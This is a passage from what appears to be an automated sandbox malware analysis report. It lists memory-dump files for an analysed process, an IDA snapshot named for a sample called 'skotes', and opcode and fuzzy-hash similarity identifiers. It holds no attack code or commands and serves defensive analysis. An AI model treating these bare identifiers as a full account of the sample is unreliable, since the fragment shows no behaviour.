                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: std::invalid_argument::invalid_argument
                                                                                                                • String ID: pScheduler$version
                                                                                                                • API String ID: 2141394445-3154422776
                                                                                                                • Opcode ID: b8b76dd8c5e27833ee882a564711a00d3b36330d89391f9983688d019b8d9aa4
                                                                                                                • Instruction ID: a5dcf427e318a4acfd77b487d2af2adcd5f614de08395be0ecdd9f27d92239ae
                                                                                                                • Opcode Fuzzy Hash: b8b76dd8c5e27833ee882a564711a00d3b36330d89391f9983688d019b8d9aa4
                                                                                                                • Instruction Fuzzy Hash: 52E02634440208F6CF26FE14D80BADC73749B05704F40C222B801111818BBC8388DA81